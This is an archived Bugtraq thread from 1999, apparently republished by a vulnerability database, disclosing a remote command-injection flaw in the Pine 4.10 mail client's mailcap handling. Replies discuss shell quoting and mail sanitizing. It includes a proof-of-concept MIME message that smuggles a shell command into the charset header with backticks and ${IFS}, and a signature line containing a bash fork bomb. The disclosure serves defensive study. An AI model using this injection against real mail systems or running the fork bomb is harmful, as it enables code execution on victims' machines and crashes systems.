Lucene search
K

pine4.10-remote.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Remote code execution in Pine 4.10 via malformed MIME messages exploiting mailcap settings.

Code
`Date: Mon, 8 Feb 1999 00:22:17 +0100  
From: Michal Zalewski <[email protected]>  
To: [email protected]  
Subject: remote exploit on pine 4.10 - neverending story?  
  
Affected systems:  
-----------------  
  
Any Un*x system running 'pine' up to version 4.10 (latest).  
  
Compromise:  
-----------  
  
Remote execution of arbitrary code when message is viewed.  
  
Details:  
--------  
  
About five months ago, I reported vunerability in metamail package used  
with pine. I also noticed that '`' character is incorrectly expanded by  
pine. Problem has been ignored (probably noone understood what I am  
talking about?;-). But no matter. An exception from /etc/mailcap:  
  
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr  
'[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput  
  
Impact:  
-------  
  
And now, ladies and gentelmen - my old bug, reinvented. Usually, above  
mailcap line is expanded to:  
  
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'  
'[a-z]'`" = iso-8859-1)  
  
Hmm, but take a look at this message:  
  
************************** MIME MESSAGE FOLLOWS **************************  
>From: Attacker <[email protected]>  
To: Victim <[email protected]>  
Subject: Happy birthday  
...  
MIME-Version: 1.0  
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"  
  
--8323328-235065145-918425607=:319  
Content-Type: TEXT/PLAIN; charset='US-ASCII'  
  
Make a wish...  
  
--8323328-235065145-918425607=:319  
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"  
Content-Transfer-Encoding: BASE64  
Content-Description: wish  
Content-Disposition: attachment; filename="wish.c"  
  
...it could be your last.  
*************************** MIME MESSAGE ENDS ***************************  
  
The result is:  
  
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr  
'[A-Z]' '[a-z]'`" = iso-8859-1)  
  
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is  
executed when message is viewed.  
  
Fix:  
----  
  
Well, it's the second time I report problems with ` in headers.  
Maybe pine developers should wait a little longer ;-)  
  
_______________________________________________________________________  
Michal Zalewski [[email protected]] [ENSI / marchew] [dione.ids.pl SYSADM]  
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:  
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]  
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]  
  
-------------------------------------------------------------------------  
  
Date: Mon, 8 Feb 1999 18:13:53 +0100  
From: Thomas Roessler <[email protected]>  
To: [email protected]  
Subject: Re: remote exploit on pine 4.10 - neverending story?  
  
This bug exhibits a general mailcap design problem, actually some  
apparent lack of clarity in RFC 1524: The mailcap format  
specification does not define where quoting takes place. As a  
result, users tend to do quoting manually using constructs like  
"%..." or '%...'. Software tends not to do _any_ quoting of its  
own.  
  
Why this means begging for desaster is obvious: Attackers can  
construct strings with appropriate shell metacharacters to trick  
users into executing arbitrary shell commands - just like Michael  
demonstrated for this special case.  
  
The only proper solution is that users MUST NOT perform any quoting  
on their own in mailcap files, and that software MUST perform proper  
shell quoting when expanding the %{something} strings. "Proper  
shell quoting" means to put the complete string into single quotes  
and to replace any ' inside the string by the sequence of characters  
'\''. (Note that this is already in some Unix programming FAQ.)  
  
"Simply" trying to escape or wipe out shell metacharacters will also  
be a recipe for problems. Think about certain bash versions'  
handling of (as far as I recall) \xff as a word separator.  
  
tlr  
--  
Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/  
2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1  
  
-------------------------------------------------------------------------  
  
Date: Mon, 8 Feb 1999 09:25:11 -0800  
From: John D. Hardin <[email protected]>  
To: [email protected]  
Subject: Re: remote exploit on pine 4.10 - neverending story?  
  
  
Okay, I have added `` -> " conversion to my procmail MIME sanitizer.  
  
Michal, is that the only way to exploit this? Or should there be ` ->  
' conversion as well?  
  
See http://www.wolfenet.com/~jhardin/procmail-security.html for  
details.  
  
--  
John Hardin KA7OHZ [email protected]  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
Your mouse has moved. Windows NT must be restarted for the change  
to take effect. Reboot now? [ OK ]  
-----------------------------------------------------------------------  
101 days until Star Wars episode I  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation